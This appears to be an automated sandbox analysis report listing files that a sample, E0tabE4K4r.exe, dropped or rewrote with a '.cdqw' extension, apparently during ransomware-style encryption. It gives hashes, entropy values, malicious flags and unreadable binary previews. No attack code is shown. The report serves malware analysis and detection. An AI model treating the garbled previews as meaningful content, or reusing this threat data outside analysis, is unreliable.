                                                                                                                                                  Preview:%!Ado-.C)....f..l.01;I.%.1;..S...p.....]y+uq.y0X...*.*/|.E+..B.........Vtl.+p...v......Y.......2...q...%.K={...FP....Bm#..2......7..........zRs(....rs5j..../....2d.w^.d.v.H.c.......y..X.,m&.?z":....>...v..z.S.y._i.:h..u`...Ms?.,........n..XE.0.!.E7L9>.K.R#C.t9.......0.0.;.`p.*.o+~=.3U?.o@X..m.#j.>..."..+5.\w.hj'...p.......r<.(......;.F..].....(1...&..:9.n3.Y1Zy.|.%...s.a..-...0..lL...R...kX3^F 6..kmI.g...$.f..P..$...n0.....%...^.,#...b.2s.>..f;.K:......fQ.HR.F.f..2.P..;Zv-r.I....5\.o.O............?.+ ..........R.u.&.../.&.%...JD....W..h..*...^...tc..'5.@....#.O.X..vu..z.5..b(.....S].A..Y-......bJn..k.)...`.E;2.z..[..*..N!}+..X........ny....0...8.h..m%.LW.|#W~.......6D.$..R......(O.]_..%.E...^.....9s.Mv<b........C.>$.FbzV.H..Y.6......I..BV...yM...s6X.7e.T]...8...rx...v..Q.n.5I....M..\.~...R.\d.].W....c..&..H..k.8@..;|@.[.ks......r~..8l...:..n...^d....G..*..D..<.4.oe..Nz.......vc.aJ.v[o...Tw.9.3....j>."l)2.4..fp....0c.>..........Z.B...CR

                                                                                                                                                  C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeSysFnt23.lst.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:PostScript document text
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):185433
                                                                                                                                                  Entropy (8bit):7.8766583246756365
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:uP//NlWRO2ktFn3Hyy+w2mBXrMBQ7djTyEgzi5K+RcVVyoyEe6JBG4wXE07ZmanK:uPHSs2s3HU5uNyEgzEoD8HXE07Zmandg
                                                                                                                                                  MD5:714F404B01DFEF2779C6B959E6587035
                                                                                                                                                  SHA1:E6679DDE11AC54FCA1AAD772A0CDD3195AF0C70E
                                                                                                                                                  SHA-256:AE0E00974A9F91ACCEDF7AE4E5ABAB1CE782F89C15DD7F51800FAD0FD969C397
                                                                                                                                                  SHA-512:0605266C30845A1CF83CECF38ED4D6A6207A0A19AD1E80234D54ACBB0844FBCCC188E1C819A56F9660BEE9317FE0FF865E814A43625B75B299504AD5AA3CE6FA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:%!Ado,......H..-...J..i?F..y.....9..yC5.w%g=...2 ...t)..n....Z...........M.F..J.....0c......B.....*..'"..W..mQ.j...............@..`4=4..v..K]..... ..S.f_.........j'.:96.VR.:J...q..$4c.#.$..T.J.F...QH5.lX.6.uo......26.f3t.TIu...t..=.:X.+..iUI..#.Yt@....(.:...c.A....6..C..Jw.4..4.89@......Z.k.....;t.du].[9w.E.(.xC....|...EB.n.9...!.........I.;..=..5...E.r.U...#6.P)>.a...W.<t....E..,.!..;.R8..z................D.v.3L...-E..#.EN!..jf.....,...l|dia.=....l.(%...H.....P......B...R.....V-.wg.."......."..,...".......V90`.'.g(".l.6..5...:.0t.%J)$..G..NC+..H..o6p2.=..GP.I$h.......H.....d..]=?E,.R.f..m[..<..6.....9.mH..f|;.w.-...X.!%.9.o.'...jRL.........#S...a.M.......-...s.c.....{Ho.]..[.H.<.....2.#......Kq..gi.)3B.3CG.......w..Oa.l...$.;.<....O..LE...}.p...a.....(I..l.w../N%{.x.......~..oW.....oV....."$T..M.Wj0..".........>k..l..,b.&...-6.k.4.gB.^$}P.......Bd.'M.6......-&...]6E^.~k:....av....m....A.......k/...1.w..N.he.l......R..0.....y.).p./a

                                                                                                                                                  C:\Users\user\Local Settings\Adobe\Acrobat\DC\IconCacheAcro65536.dat.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):206549
                                                                                                                                                  Entropy (8bit):7.250273197825296
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:xPwNNQkrTMUi/8xtFDubVHdQsGVlu25nT:GyuiExnubdzGVkW
                                                                                                                                                  MD5:BD764EA708A6A3E2D227399F45DDF47F
                                                                                                                                                  SHA1:B6A0C94350C53E0F7786469D24542C11C3927AA5
                                                                                                                                                  SHA-256:70DF6DDF8D5ECA03E9D62BE7CD65D8FCB78B6C348A5A410F6779002E1DBD723F
                                                                                                                                                  SHA-512:5E3C7E0F043C6048C122EF07418D9975C93709A72AA238FAE08DA25BF1EABB4F5957EA2153BF6F9FA815DBE283E5FB773B452552484B668F601B7637DC512CD3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:Adobe.. w+s{...^E...P?....`...'.!..H.....+...A.......w.#c^.R....2.8.]'..D....W..".*...|....n..&..W...T.U.e.....WrI.....s....0ih!7.z.-....b..5....]..`..7*{....-..,....:.....d.T._.....v....tNA.&q....."..."w.$2B......2Y.o.,....b..|..].!g..0..s.N.5.-.K....T{...*.)U<.....e..*@>E..y..e+.0..&O....$t.\h.S.9.c..|......*._...J;.k&)...V...}y..lb.E....;.2.$.@..........M@.F.w...HV...M.@.~m...;;..=c4"`G.....H|J.l...BM.....cAEb....G!.J.+R.E4P..<!d.=.....6e.>.]..o....Z.&g..;.e....da.3 c.._........ ..m.T..z........._.X.9......~Q.;.A'.%Mh....F..I.(.@.....c.@.aCv...s)T.Y....t...Q`..C...g?>.s..~k......!.S.x....V..5..6m.;w^...(.6A..Np.(<:......"...:.>ri.....Qo..B.|<`G.)N.D........'$.TN..lN.|7.Ji......v.yF_).;....x.[..s(.........._.k.5.7..7.]...,).;p...l.WQ..!....+....oz.....A._P.XcQ.......Q...F.&.z..Q......bJ.3.L.........Q....O...b..k...HO.6s_;.x>?.....-t......X].EB0.F.G[m#...........Oi,.....h.|."2pV#..2...P.).K...?^...>(..<.pa...w......5.`.sK..

                                                                                                                                                  C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):67060
                                                                                                                                                  Entropy (8bit):7.997541287202827
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:0sW+JYqqaDBvaoMQOEiyxwaGb3J9Bx5nLriTRuSY6Voj:0RaDBvaoMsi+VmJbxZLmTm6Voj
                                                                                                                                                  MD5:F6699931CFD688C6380CA3ECA9ADB87A
                                                                                                                                                  SHA1:064C726E7D9273A3296A3BF8B567D079917151D3
                                                                                                                                                  SHA-256:5119CA2CBB122C0DB41CAFE4C7409D540EDC9FDBB02BAFCDAD91669BA4C7EB53
                                                                                                                                                  SHA-512:7AD6803CCB2622362926ADDD0CD0B0EB5858E8E90372A0968ED73149457351BA8FBFD6FBF8A7EC73A4813E77839BF0B3F105A23B4F0B1F8F6728C302347FC144
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:4.397w...U..R..EC...f.;~...P..m.L...!...M47.H.....A....R.o.OX..y.......}..b..(v.b8....qE..&..R..Y.SZ..{..9...cj>...z`.U..`.8..J.@...s"......N......%C0D...T....|..l...mq.U.....`.\v..^...1.-U{..5.CQ......Ua?...3I......k....K.......e.xL....r.) .;.....UB.U....}@.."..h..zr$,...*.!..C....~.K.^.j+..........5....~.)..:.+.......(..TD........u.D..%H....|..j.......d\.O.~#M.A}..g]m..:x..+.6.....-...QTo..T......i.....}d$.bz.i.._;1.?..@.........GC@o".?y..m..^h$4..e.f2=....@.......?....y..a)..4&>N.w. a.i5.~....X.h...) Qv+&3.W+qE6.Bc .l.EY....>..p.%..#0.{N..B..Bj......'..{6...(.=..m.<...M*m~ l.q_L0C1..b....~m.%..N...Q.KG.,.....n..B..&..r..l...[n.~oj..{.x*.%y5.?.....$G..Pw....m..&...-..k.D.@W.Z...h-0..1.1{..,..y.b...rLw]:.$..[xV.%.._..0J...f...[?.e..L.:.....t...3G..mAZ.q..H....&....<..G).#........6..7T f.\B.V.T$D.@....O..y...Y.E....c.......kYH.]>'..?Myp....\....q..........l...T.b..#O}Pf....}......xu......X..'.P.......@..~...a.....@..r.T..|..j.b......G[.

                                                                                                                                                  C:\Users\user\Local Settings\Adobe\Color\ACECache11.lst.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):932
                                                                                                                                                  Entropy (8bit):7.756791437450642
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:QiGeW19EbLo/hAUXz9486vMgJNsTGOsp2XhepHd98KRRB+2bD:JW/Egqez94Mg4KOU2ReXmkzlD
                                                                                                                                                  MD5:98B570EFE4ECD9CF53CBC7123654BDB9
                                                                                                                                                  SHA1:1F398550ECD877B1F2865A3842C6A5F15C7C3B6C
                                                                                                                                                  SHA-256:7F362B95295EB279236FDF3CD13397467DF2AC6B5B3A450526EEF6D8CE5A2EE0
                                                                                                                                                  SHA-512:CF517CD867E43618FD8829486465ACD82AAABD31676D07D5F18B0D994F2155B6A4A09F0ABA55979E6A554AED46092320EC62B917E530375D13042C38BE175BB4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:CPSA....0...?.v$.F.....-.%......){.+..._..bw.....{.T..x.#.t._&..hm.[..e.Zw.i....`A.1.0Wi\....a..^...S.,.....:Y..[\./Q....%..t...,n....D.lF.. .Rj.....:q.[......U@....Ix....}.3.'....O..f.....4.d...$SO. ..\.R.m..(p.R.*.j...m.*..2'...P.,...H.N...Y./.".g.Zu.F])....-M.x.;..&(B....K....B...V.. .M.A.u..Jt..0........3y._.z....F"...-...}&....o.)..)F..1..h..].b..:,.....b.*...W.>...!...*.:6..Y..Iio.XaX..........i..^.._#....w=;x>.W.J...K}....;.+./..~.....R+|...2x.^.....K.....7.//.0.2..l.j..$...0..'3..Z.u.:hz.>...R.....];..f.O>..w.......Uj[.P...o.D.......H0.dC`X..m....r..8.._F).....WpG)\.9.b....R.G.Tm..@..Att..V.~...)s...MG.GA..-4..1.V.....m.....A....k..H ?,..d...3.....6....E......."..../.Fz..%..6iQ.M./X...9.k0.=*....s.cm'....E.eI.#.C..m....S...,....sf..a|=.O..1/..A.)..Y......F.i.9:0.vz..2.I.A..)?L..[.....Az...X}O..N..$mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\Local Settings\Comms\UnistoreDB\USS.jcp.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8526
                                                                                                                                                  Entropy (8bit):7.974731078503766
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:8GwG8J+SFWEJmN/3OscZPcddgzJnuaut3zwRgeamo9J:GhJ+SFGd3BcZ0ddSm3zQkmeJ
                                                                                                                                                  MD5:0671FA46E763433A75AE29BF19D35F33
                                                                                                                                                  SHA1:517177FC4D4C3060CFEFC5B78034847E3FA54EB4
                                                                                                                                                  SHA-256:51839D457F25FAB0095FCBF3B6B3A1F38B8BDB0A2C1BA4218C194B5FF6D6A786
                                                                                                                                                  SHA-512:0CFB4A30392CB66C2EF67C747382299FD6691C55C631DA7726F38500266449ADE479041A72529C26A36AAC8E26B45D2F0DD5C9875523C5F474FB9F7631AB4C30
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:V.. .F"L.L.0%...w..Z.t-........X.%.{.}...$....Fm..wZ.x...X.....aZ.G.l....ew..%;..K..R...[ywg.U.gh..q5.g...BzSo=2.-...K.!?.z..-...gL.f....A6.-.hM..r[..)..t|.....^.,...6.o"v..%..3.]p..s.?..@..E....1G.,..Ue..e..d.........!R.......U...mL.?|./.0....;..Jn......2wA.a.qS....Q2.#.......3e.dnW.8..b.......k..=.S"f..+_).5..W...a...w>.W.n.WV.b......s.....5......mf.<..J..6.....J.M.)............r..L)./....o.........\.....I.Q..~..&...D...... X..]I)..<D.`.iP...~.nhR..df.O..7.......P$..Tp..,"6-...\.6e&^.....tm.~.*....U.Y_q...6...-.Z@s...4e.......{F....t....C+..............2...)..CtY.K.....L;...Y..s]r=......0..(v.........V.v1.X..I..[..8...rP.m.*...]i.'....x.......R....s&.B... va.=.d.....P$.i.......A..@Q..l_..h..).|sj).J?.)..an..L...:.k...{........qUjy...a.. ....@.......?..5.jO.....{!G.I.Rk...Pm.U.*.5;.f.H......."6...3.s.C..D...Tg..:..T2...)t..Z..Q.(...Jz.m....BP....g..S.S7.0]....Q...T&!..).Yi.JsA(.D.i.&...Y&A.R.-t.H.'.... ..o.",..if.$..".`.S.bP..k.Q..

                                                                                                                                                  C:\Users\user\Local Settings\Comms\UnistoreDB\USS.jtx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3146062
                                                                                                                                                  Entropy (8bit):1.7306362749544866
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:coPnM68zV/i6boa2ViFA+05f1fODI65azgkLDHA3igSbq2rwRDOAlVTtl1FtVs5D:c3LTFAxfO35akmD/X0l9sV
                                                                                                                                                  MD5:4ED8B0CCD3A1597DA413C11439CC92EB
                                                                                                                                                  SHA1:5312686DD79DF5F1FC69FA1D45A5F4B0265FBFD0
                                                                                                                                                  SHA-256:2B12BD5BCF63FF7600F15FF1AF9683D013C98B0AB4389925EF93EAB3E76B5510
                                                                                                                                                  SHA-512:7D5B75116D09F20CAB505772AAE6D98334E0B1AE9B5AF7DB10128922DABC1488043F5DE7693351B6F4568508AA2D3CE679AF3B046EBE7662BB037538DF6B96AB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:R;.5..VI..QGs.HmA.AQ..2.@.Vr.o~...1..}.Ss.......(...../u>....G?............=mMT.OX.L.?.c..INl.mSs.<....7.M....).;....W...o...p\I]?.'... ..b...hC....MLd.............G L..............qP..R....b...q.X.H...o..W(...x..e.v.|...xG......T...........=|k..$HS..sw...D.i....w.7a.[....]{.Pwb.+....Bu......U........%.......m.;.A......:..R2:...<.R_....p.N...>.9...:I......e.....v....(4.d..g.I..#..#..h..(...+!..@.%%......1....^.Fp*-A\7....l....ng..t.....I+"...n\.......py:.....'.b+.K...}.~@...o._\...=.e.>...K]...Rh...b/-vl.T...:.H^v.ZG..P[.\..Jm.Mg..G....F5.......B<...:.2...tM-*...y.Q.......R././...>.n@..........8...E...o.F...V.jV..l3.|.4...t..%.5;]}.g...P7......g.+...!..e.$..V..%...-.-.w..!....S..\.EO..%..*.%.....3F.3NeH..s#l....6dG?{.j_mi...wny..D.}.&2..x..........Tp.:B...^i..h.}.Tn....@\.....vy'.C....iF..T....t.p..4.&......P.h_C...i..}..tV_.(.k..S.y.....[.K.@..u.@E....fN..1..c..2D(.\......;...V/s.........e.......L..cy.O..s.j..)5...%.....F`L...f#...E..

                                                                                                                                                  C:\Users\user\Local Settings\Comms\UnistoreDB\USSres00001.jrs.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3146062
                                                                                                                                                  Entropy (8bit):0.67061798549968
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:0lg1un6TbHlfVa/RPlHIoK1i0jC5RgGrmCjsSItDmx7x:UHWhf0PIoNQQVrR+6x1
                                                                                                                                                  MD5:10032BD4B67F1900ECD1EA4E3D4EA75D
                                                                                                                                                  SHA1:0AB63EEADA8C6CC52643756309978B5588D142E3
                                                                                                                                                  SHA-256:B0357DE003207004FDB154FF531A64D424DF03D8A1E7C9749D29D7E17B31E29F
                                                                                                                                                  SHA-512:0AEAE7A6619CF0996594DF8337683C2A544C2E4A8257357AF23B32B3E450F56E2C8E9F97E1F82049B1FABF1540A96C6810269A01AA6CE3EB24EA27AEF85ADC9F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.......J..U-.v...bC..g......T.O.;.*5.%.g.(z.Z.v$./..S[8...r..R...k..P..F..l.t.l...,d...e....m9?.S..3.E...A..}...}.......w...h..-...}.[U.mO..sey~Xr.....jI..>.......^T.YH.X.............J.a..A....G....d..d&....f..W.x...#....q3/7k.A....nT....:..w...h...Q..,.~a].aM.....([......#.#..un`\x...B.m..m.EF:.....v...1yG...<lmO..e.......Bn....c.....E,.K.].YlD/..U..w.._..z..4LO4.~j..."ll.d.[.V./..sRz..F~...E.....m....%M3..~.`1Q.K.+..r..3...eK.[.>.p...."=.o....7......b.G.A..myd..]...T5.3=...X.Lu.!...R.....a.d......&E.e.x.!H./..-.F].;h.6r.."J]......~o.6..F.{...?2.R.&.'..:.E..k.....GB..p.1..P'.KV,.,...Au1...n..!...^..^....q.R.g...y.v..g....rh..@43_2..{*I......ikX..M........m8K.611.{..t..H].Wc.B.........C./.]w...g..1..u.g..C...Q41O....l...JN.9..<...&..q.]..........o`r.+]G..$~....'./0.c...p.M.."....w.cd.....;.m.6.....Zt.....0.%..Mlqy.......N.2.?X.',I.1b.../x5...M.5?:..8..O6..Zu.^zj..2.l/..80.xN..%.8&e..c....8...)x....`....5u...6..3lcf.g.W.......\.....W.4#P....

                                                                                                                                                  C:\Users\user\Local Settings\Comms\UnistoreDB\USSres00002.jrs.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3146062
                                                                                                                                                  Entropy (8bit):0.6705366470405941
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:lN9xE1ld5NoUxr6slHffEI6sJvWek96KF7HyjK6aCWP7P++n+l7IX:lN9IlrNoU5nT9IeLM7HPRP7m+n+lEX
                                                                                                                                                  MD5:2459C9A063684F53566DE877A0682A09
                                                                                                                                                  SHA1:D17A75E5B3BB243A5987C876AA6213D1E61AFA04
                                                                                                                                                  SHA-256:61BF498078848961D0E817073C1ABA23275137752AD2AD8B42B3BBBB231F9874
                                                                                                                                                  SHA-512:DD698DB5B99DF9DFA810D44D45F0DA3F24C20F8CAB5AEEC7149CF0FD6E5890136999831FEE32B228B591438ADA2DE8F62752A72E8E7F48FF846862F9A909B19C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.........%......~9-.&|.WGF...../i.`"..l..'.fI...z~@..X.3`.v..]o......g..P..\.'..v.s..j.XJ.gY...s.\o<.?....n..........1<..H....O.\..q,bb.........8....u.~#.#oaq)..F.`........M.I.....9...X.C..~.u..<.H{6...M..-V..|..W...Vt..d.]...Q.&...v.kt..a.v.h9..{.l]...3Y....vc)...I!9..$r';.3..S.+.|}.O..:.O.X.w)..>..>..U]....f.c1...X...?).v#...6^.R.k..CL8.........Vt.M..5..Y.pd/...Y.k...}.....c...S..ML.1{..OQ=u..@c....x..Nw@b%|.|..%65...1..F../.....#.|R.o................$...A_.\..>..B.....@......a@@g.;.A.?.%eU.....V...x..P.".....=...1Y.........x..{.r.....Q.Q...."7...X${9..t...W8.bR....1Ss4.D..B.|..s.y....P.O....1....mPHY.nv..rdlz\...R..[...gI6.1....n[h.@.{..#}.m'.w.}8_.Y..p..LX..D..<.._..y...q........<j.....C,.-..T..l_...:.>.c...z.G.-e.}..|...@.3 3B.&......r.n.[....."....#d..".`...s.....0..s}z..U.W..c6...X....!._*..d^...Y..a..>..=...Clz...9.F..i*......&...\.....yc@.?'..ro..z.xA...}Q...N._.'..h..?..../W.@(]......A5}.bJ9..x-....y.3.QM.M.TS........-.(.&.

                                                                                                                                                  C:\Users\user\Local Settings\Comms\UnistoreDB\USStmp.jtx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3146062
                                                                                                                                                  Entropy (8bit):0.6705623675751299
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:OL4T4z49zT2dq+bvpZt+YPYTw0uZSKxyrth6HtSYa1f60e2:W4Tsdzbvp3+FTiS0Nna1iS
                                                                                                                                                  MD5:276BA4E75A1A504B12AC4872D7C94482
                                                                                                                                                  SHA1:679D449A707CF18096562AA5EBAD0D170FA01AEA
                                                                                                                                                  SHA-256:087D10F6FE7B2B0A991F7A3D1E546BC4539DA5276971B2BB68C32E2452C9ABEB
                                                                                                                                                  SHA-512:11D3A506956E6EB04F40EC4FB4C0E074DCB6DDAC814EA65BCECCE474B048CBF5DB7AC446448D3681B8FEC582E4DF02D6A68AF0F123917039862A96583F3D8E48
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:......V.{.MU.K,.#XK...f*..OF.{.Gd..z......y......8.D.VX.AN"..Cx"..&......T......-.../]D...s...p..V.]..k....D.i.yM....8.W.|.:..n....tH.r......ao..y:...2..d...$&...T_..R.......C...I.......\J...........H..B.D.{w..:...2.#_T..Y_.,.Z.|.X....6...[.wXF+C.6(~......:.u...,.{c...*....<Y4..A..+...}..{h.%.z.Z...N.J3..ivF.Q.D...fb.wZN/.P..S<nw.m!'(....d.. .wH:dQ....S.M.h.T.....k.(....._.U&..%. ]...?.R{`)...+Bc..W..'.....s....o.U.?.M..,;.........e]0....U~%!K.....Z.J.~Zau...N).5.u...H...O...&9#qL.k,...n!._Cv....{.Cd.Ly...1....".....E............j.o.G...:.e.:.3.r.....Y.Y?.q... ...S....H........7...?z...Q..p.bm....%V...z.[T..;.m....$....VF.Xz..*......ifh.Z.R.(v.v..@o7.'lEQs.RTs.5......@}A..i..obm.~].R.U3...b?t:.......|....M.6.=. s..Q..Y...PmC.%..B*.).JA L.i.....9WXc...-&.."9..bD.Q..n.B....K6S.!..s.=.jF.LoKK.9...N<.%P. .."j.".XB.s..%.CG,.I.e.Y...*S...#b.]Z...6*HJlG...}......&..<.t.1i.[...R.$InZ2..AK.D....mKE:}.g.ha)F:....^..1....Z......y._........Xs.I.8">H.....`d..

                                                                                                                                                  C:\Users\user\Local Settings\Comms\UnistoreDB\store.jfm.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):16718
                                                                                                                                                  Entropy (8bit):7.98890728396996
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:RQhIPAOPkhzUpj1iCb7tGUdAYvUqhJh3LKPNifuAtWSxK9o7fXO8b1t/7NCUo:RQikhu5bIyAYsE/3LGNFA5K9oLe8b1g
                                                                                                                                                  MD5:7EA7A8210DEB612A1BC4818BB05CF5C2
                                                                                                                                                  SHA1:93DF35EAF8793AD7DC491822CA94AF452D738F49
                                                                                                                                                  SHA-256:8E20D8ABEE0B4054B10EAD6669F0EBCB477B5EDF1C276AD0CADC693FF671291C
                                                                                                                                                  SHA-512:BA0FAFE24F30D849D85D85B937D81331965313B00D37B04D869CA1A90595C09A25BDEE1591851DDC724DB4CCF546CF3F365A061A2866CCD64C41174CF28B6B47
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..4(....$....._....d...=^.ql..=..$>yg..'......1.z...Pr.......95.*Q......~.D..?..0...U....;.q..B..<i'..-t...L..cY.)..!..T..}........O.....]....ozg*.....~..#.{.X..F.0.F..j)...k......H..#...u.(f.b..l/..mI.FF..Ps.8.?......q.b.v..;.G.^;.KKo.....^4.e..Q.l...o..h.......t...U.@.&"...ssy....d.e......O.....A(c.}.N.....&...VGT(.....g.(l...7Q.q.`Z.>,~%.%:`..e...S..,e.2.6|....."+.E....@..|..H4m.Q....%..`.*.iX.=..C..2.......c.;[.!.^.CW.Y.W.M^.f8......w.......U.u.)m^.Q.J.\..4.....LSL2..."..!....|.$.o#...8...'.yI.R^.u...B..b.O\.k..o].}...cP. .?o.....qM.t.XRm.K<....y.(....q..r.dH*0`.!c.....W=4....`6.).l)../E......y.;<Y. 5..~]k..0.q....|........o.E.....<.P^2b..s.p^..2..T.....7.r..QC..O6EK..._'EW...,...M.u..N.wd%.,O&b..q.../k.c......JS...6W..:......!@....q.L.~..-;.y= #L1....B...y.$....!WK.....}.....l5..$i...:..c.G*...rH!..}........../...1.:QR7..@N....Zv<. =...Z-XD..w.....I/.m.R. ..q...M....^o...Tv.....e. 7;%-.V.&.2S.<<..9...>.N.'.~7....S. s1#..X1....}|.. s.

                                                                                                                                                  C:\Users\user\Local Settings\Comms\UnistoreDB\store.vol.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6291790
                                                                                                                                                  Entropy (8bit):0.4528793361161117
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:5OVeGocStX7eNhpSw0ZIDBw9ENpQziAB0pUcRt6w/NZnn4CfYeWUfL:+xo/XKlSPZZuNp80KqTnn4CfYjUfL
                                                                                                                                                  MD5:40CBD81DD33399EF00D39ECD7F77400C
                                                                                                                                                  SHA1:1A21BAD13943025876FC8F966225768DE540E62C
                                                                                                                                                  SHA-256:FDC21CE1FD53C05DEB485F9847579481A4808722B0034FFC931AC4716F9FBF0D
                                                                                                                                                  SHA-512:D0B00373B641EFA24F04AA9794C3B67719C9B3094D19A5AD36B54ED7FCBD820BD7C7A98EDDE826E386CEB944E5B88383654E58164FE0DB2F84296F80A05E4D6C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:Nz...c.Izp}...l.3.Sh...S.G.....@/.@..S......L-9/....O.....6.&...)8..N.9E...eC.~M.foz.......NZ....N.M......%....B.5..6sR......(u..L."t..Hb..D..k.?..h.....l.r...b...W....2.W.C.G..(.M.9.VAX.../.MK...6.......fc........t..:.3..............wL.\. ..eU.....z_...l$m..B".#..[..R..;p..Q%.z,..?...[.e.....\0..2....G ......PS..L.&.V.aV.=F,...3K.1._...CS.o..8.u...Dv.N8;. .....;...CP...rG.#....?......O.M...<..zz.b.U.D..L.e...X........T......,E.....x^~.FB.++f.6.Z...f... .k.....C......B.q..uN.:_.fR.A;.....*h..o....P.A..!.T.P%a4=...9.1s..3Jps.^.........y......6.K.h.9.z..Hq.i.R..1M.%|>..bA.lm.....p.........z.;..Urf.B.....A7..5..i^.d.1..+....._R.<.`..hT..=<_k.$V.Yp...10.p....G.(.5s..s..7.c8..7./S.6..G]...!.-..aL)._....!..KY...(U.WY...Eg..y.)..*.k.Y.......u.7N...L.@7.G..}..t...C.p...u..w.2...8....A..pQr.b.o..".U.`...~E....?{s.h.&>...A........=\_..~>..Z.....2.|l.MIF[/..{*...q......Et....<.W8h.^.w1.-..If'.Q.j:I...R..s.8S..o..T...^...F...x....3...eA.c.4=

                                                                                                                                                  C:\Users\user\Local Settings\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65886
                                                                                                                                                  Entropy (8bit):7.996947611430109
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:/dJkxOuspk5VVEwd5X94K8TGlkDkzL5Ff8Lc8+4XdaXCN+i2W4ezS:/dJyT5VGZTGwkzLDf8Y8+cay0lxezS
                                                                                                                                                  MD5:22E4723A6928407F9677206E81CA9A91
                                                                                                                                                  SHA1:0BC3B625A2E05C3BF09AFCE11F700A8D8B5CA883
                                                                                                                                                  SHA-256:60CE4E8A96296FC269CFC96243AB288CF305A1274498AF3FA7C6F32927A8FB7B
                                                                                                                                                  SHA-512:3711700EA575FACFBA1EC04A3BEAA5E0139BD512EDD1B1028D2443410123A9C9C65A84F94181F705ABE25C6B7CC6706F4F9A67A46B2E318CFA5430F8917E64A9
                                                                                                                                                  Malicious:true
